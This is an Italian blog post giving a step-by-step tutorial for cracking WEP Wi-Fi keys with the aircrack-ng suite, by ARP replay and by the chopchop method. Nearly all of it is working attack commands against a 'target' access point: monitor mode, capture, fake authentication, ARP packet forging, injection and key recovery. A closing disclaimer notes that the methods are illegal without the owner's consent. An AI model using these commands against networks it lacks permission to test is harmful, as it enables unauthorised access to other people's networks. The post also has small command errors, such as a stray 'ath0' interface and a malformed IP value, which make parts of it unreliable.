lunedì 13 dicembre 2010

WEP crack ‘--arpreplay’ '--chopchop’


PREREQUISITI:
  1. Avere una distribuzione Linux based
  2. conoscenze minime dei sistemi Unix
  3. aver installato la suite di tool aircrack-ng
In questo articolo parlerò di come cracckare una rete WEP tramite il sistema PTW in due metodi:

1) arpreplay
2) chopchop




METODO ‘ARPREPLAY’

a) Per prima cosa dobbiamo sapere il nome della nostra interfaccia di rete wifi. Usiamo il seguente comando:
  • iwconfig
Solitamente il nome è del tipo ‘wlan0′.

b) Ora dobbiamo mettere la scheda in modalità monitor:
  • sudo airmon-ng start wlan0
Può capitare che, dopo aver lanciato il comando, venga creata in interfaccia virtuale di nome ‘mon0′… questa è quella che dovrete utilizzare quì di seguito. Nel caso questo non avvenga dovrete usare ‘wlan0′.

c) Ora dobbiamo fare una scansione delle reti presenti nelle vicinanze:
  • sudo airodump-ng –write cap mon0
–write = scrive nel file cap.cap
mon0 = è l’interfaccia di rete

In questo modo verranno scritte nel file cap.cap tutte le informazioni catturate.

d) Ora dobbiamo concentrarci sulla nostra rete bersaglio in modo da catturare escusivamente i file di quella rete:
  • sudo airodump-ng -c [canale AP] -b [MAC address] -w cap mon0
-c  = dobbiamo mettere il canale dell’AP
-b   = quì mettiamo il MAC dell’AP da cracckare
-w = scrive sempre sul file cap.cap
mon0 =   è l’interfaccia di rete
Ora, l’unico modo per cracckare una rete è avere un grosso quantitativo di pacchetti da poter analizzare.  Solitamente una rete non ha un grosso quantitativo di pacchetti come traffico, almeno che l’utente attaccato non stia usando la rete per qualche motivo. Ma in ogni caso ci vorrebbe molto tempo (provare per credere).

e) Il nostro scopo è di catturare 5000-10000 ‘DATA’ per una WEP 64 bit, 15000-20000 per una WEP 128 bit.
Quindi useremo il seguente comando:
  • aireplay-ng –arpreplay -b [BSSID AP] -h [MAC STATION] [nome interfaccia]
-b   = il MAC dell’AP
-h = il MAC collegato a quell’AP che viene indicato in basso accanto al MAC dell’AP sotto la voce ‘STATION’
-[nome interfaccia] =  la solita mon0
Come vedete stiamo usando il metodo ‘arpreplay’. Il metodo appena descritto è detto ‘packet injection’. Non tutte le schede supportano l’injection. Anche se ormai sono poche.

f) Appena avremo raggiunto i pacchetti (DATA) necessari dovremo lanciare il seguente comando:
  • aircrack-ng -z -b [BSSID AP] [nome dei file catturati]*.cap
-z =tipo di attacco
-b =  MAC  dell’AP
-[nome dei fiel catturati]*.cap    nel nostro caso sarà   ‘cap*.cap’ … l’asterisco sta per tutti i file cap
Nel caso i pacchetti non fossero abbastanza, comparirà un messaggio del tipo : “Try at 5000 IVS”
In questo caso non fate nulla, lasciate andare avanti la cattura dei pacchetti e appena saranno raggiunti i necessari richiesti, il programma ripartirà automaticamente.
Il messaggio di successo sarà :   KEY FOUND! [XX:XX:XX:XX:XX]       dove al posto delle X ci sarà la password dell’AP.  Possiamo inserire direttamente la password togliendo i due punti, quindi   XXXXXXXXXX.




METODO ‘CHOPCHOP’

Ora ripetiamo i punti a), b), c), d) della precedente parte.
In questo caso non dobbiamo usare la ‘STATION’ abbinata all’AP scelto, ma dobbiamo associare il MAC della nostra scheda all’AP in questo modo:
  • aireplay-ng -1 0  -a [MAC AP] -h [MAC mia scheda] mon0
-1 = metodo per l’autentificazione
-a = il MAC dell’AP
-h = il MAC della nostra scheda
mon0 = interfaccia scheda
Ora, sempre usando il tool ‘aireplay-ng’, dobbiamo catturare i pacchetti:
  • aireplay-ng -4  -b [MAC dell'AP] -h [MAC mia scheda] mon0
-4 = metodo di attacco chopchop
-b = MAC dell’AP
-h = MAC della mia scheda
mon0 = interfaccia come sempre
Ora dobbiamo creare un pacchetto per la richiesta di ARP con il toll packetforge-ng:
  • packetforge-ng -0 -a [MAC dell'AP] -h [MAC mia scheda] -k 255.255.255.255 -l 255.255.255.255.255 -y [nome].xor -w [nome pacchetti]
-0 = crea i pacchetti ARP
-a = MAC dell’AP
-h = MAC mia scheda
-k = IP di destinazione
-l = source IP
-y = legge i PRGA dal file creato con aireplay-ng
-w = crea il file .cap
Ora dobbiamo eseguire il packet injection sfruttando i pacchetti catturati in precedenza (si raccomanda di usare sempre lo stesso nome dei pacchetti catturati per evitare di fare confusione):
  • aireplay-ng -2 -r [nome file] ath0
-2 = interactive frame selection (injection)
-r = qui dobbiamo mettere il nome del file creato precedentemente con -w
Ora non ci resta che analizzare i pacchetti catturati per trovare la password:
  • aircrack-ng -P 2 -b 00:18:F6:AC:11:13 [nome file]*.cap
-P = PTW debug
2 = PTW
-b = MAC dell’AP
[nome file] = al posto di questo dobbiamo mettere il nome dei file catturati con -w
E come prima il risultato sarà:  KEY FOUND! XX:XX:XX:XX:XX  e la password è  senza i due punti.
In caso di errori, suggerimenti o altro commentate!
DISCLAIMER:  i metodi precedentemente descritti sono assolutamente illegali nel caso siano usati su reti non proprie o senza il consenso del proprietario. Non mi prendo nessuna responsabilità dell’uso di questa guida. Questa è esclusivamente a scopo informativo!

Nessun commento:

Posta un commento